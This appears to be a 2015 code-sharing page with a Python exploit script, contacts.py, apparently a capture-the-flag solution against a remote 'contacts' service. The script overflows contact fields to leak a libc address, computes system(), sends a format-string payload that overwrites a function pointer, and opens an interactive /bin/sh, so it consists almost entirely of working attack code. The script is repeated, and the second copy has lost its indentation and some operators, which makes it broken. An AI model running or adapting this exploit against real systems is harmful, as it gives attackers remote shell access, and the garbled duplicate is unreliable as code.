peternguyen93 · September 21, 2015 02:37
diff --git a/contacts.py b/contacts.py
 #!/usr/bin/python

 from Pwn import *

 p = Pwn(host='54.165.223.128',port=2555)
 # p = Pwn()

 def create_contact(name,description):
 	p.read_until('>>>')
 	p.write('1\n')
 	p.read_until('Name:')
 	p.send(name + '\n')
 	p.read_until('Enter Phone No:')
 	p.write('123123123\n')
 	p.read_until('Length of description:')
 	p.write(str(len(description) + 1) + '\n')
 	p.read_until('Enter description:\n\t\t')
 	p.send(description + '\n')

 def edit_concat(**kwargs):
 	p.read_until('>>>')
 	p.write('3\n') # edit contact
 	p.send(kwargs['name'] + '\n')

 	p.read_until('>>>')
 	if kwargs['mode'] == 2:
 		p.write('2\n')
 		p.read_until('Length of description:')
 		p.write(str(len(kwargs['description']) + 1) + '\n')
 		p.read_until('Description:')
 		p.send(kwargs['description'] + '\n')
 	else:
 		p.write('1\n')
 		p.read_until('New name:')
 		p.write(kwargs['new_name'])

 def exploit():
 	p.connect()
 	# raw_input('>')
 	create_contact('peter1','A'*79)
 	create_contact('peter2','A'*79)

 	leak = 'A'*72 + p.pack(0x0804b010) + p.pack(0x0804b010) + 'peter2'
 	edit_concat(name='peter1',mode=2,description=leak)
 	edit_concat(name='peter1',mode=1,new_name=leak)

 	p.read_until('>>>')
 	p.write('4\n')
 	leak = p.read_until('Menu:')
 	# print repr(leak)
 	i = leak.index('Name: peter2\n\tLength 80\n\tPhone #:') + 34
 	leak = p.unpack(leak[i:i + 4])

 	offset = p.get_libc_offset(leak,'printf')
 	system = leak - offset

 	print '[+] printf():',hex(leak)
 	print '[+] system():',hex(system)

 	create_contact('peter3','A'*79)
 	create_contact('peter4','A'*79)

 	first = system & 0xffff
 	second = (system >> 16) - first

 	fmt = '%{0}x%1$n%{1}x%9$n'.format(str(first),str(second))
 	# print fmt
 	# raw_input('>>')

 	payload = p.pack(0x0804b030)*(72/4)
 	payload+= p.pack(0x804b198) + p.pack(0x0804b030) # fake contact
 	payload+= fmt + '%p'*21 + p.pack(0x0804b032) + '%p'*40

 	edit_concat(name='peter3',mode=2,description=payload)
 	edit_concat(name='peter3',mode=1,new_name=payload)


 	p.read_until('>>>') # trigger bug
 	p.write('4\n')

 	p.read_until('>>>')
 	p.write('1\n')
 	p.read_until('Name:')
 	p.write('/bin/sh\n')

 	p.io()

 exploit()
	#!/usr/bin/python

	from Pwn import *

	p = Pwn(host='54.165.223.128',port=2555)
	# p = Pwn()

	def create_contact(name,description):
	p.read_until('>>>')
	p.write('1\n')
	p.read_until('Name:')
	p.send(name + '\n')
	p.read_until('Enter Phone No:')
	p.write('123123123\n')
	p.read_until('Length of description:')
	p.write(str(len(description) + 1) + '\n')
	p.read_until('Enter description:\n\t\t')
	p.send(description + '\n')

	def edit_concat(**kwargs):
	p.read_until('>>>')
	p.write('3\n') # edit contact
	p.send(kwargs['name'] + '\n')

	p.read_until('>>>')
	if kwargs['mode'] == 2:
	p.write('2\n')
	p.read_until('Length of description:')
	p.write(str(len(kwargs['description']) + 1) + '\n')
	p.read_until('Description:')
	p.send(kwargs['description'] + '\n')
	else:
	p.write('1\n')
	p.read_until('New name:')
	p.write(kwargs['new_name'])

	def exploit():
	p.connect()
	# raw_input('>')
	create_contact('peter1','A'*79)
	create_contact('peter2','A'*79)

	leak = 'A'*72 + p.pack(0x0804b010) + p.pack(0x0804b010) + 'peter2'
	edit_concat(name='peter1',mode=2,description=leak)
	edit_concat(name='peter1',mode=1,new_name=leak)

	p.read_until('>>>')
	p.write('4\n')
	leak = p.read_until('Menu:')
	# print repr(leak)
	i = leak.index('Name: peter2\n\tLength 80\n\tPhone #:') + 34
	leak = p.unpack(leak[i:i + 4])

	offset = p.get_libc_offset(leak,'printf')
	system = leak - offset

	print '[+] printf():',hex(leak)
	print '[+] system():',hex(system)

	create_contact('peter3','A'*79)
	create_contact('peter4','A'*79)

	first = system & 0xffff
	second = (system >> 16) - first

	fmt = '%{0}x%1$n%{1}x%9$n'.format(str(first),str(second))
	# print fmt
	# raw_input('>>')

	payload = p.pack(0x0804b030)*(72/4)
	payload+= p.pack(0x804b198) + p.pack(0x0804b030) # fake contact
	payload+= fmt + '%p'21 + p.pack(0x0804b032) + '%p'40

	edit_concat(name='peter3',mode=2,description=payload)
	edit_concat(name='peter3',mode=1,new_name=payload)


	p.read_until('>>>') # trigger bug
	p.write('4\n')

	p.read_until('>>>')
	p.write('1\n')
	p.read_until('Name:')
	p.write('/bin/sh\n')

	p.io()

	exploit()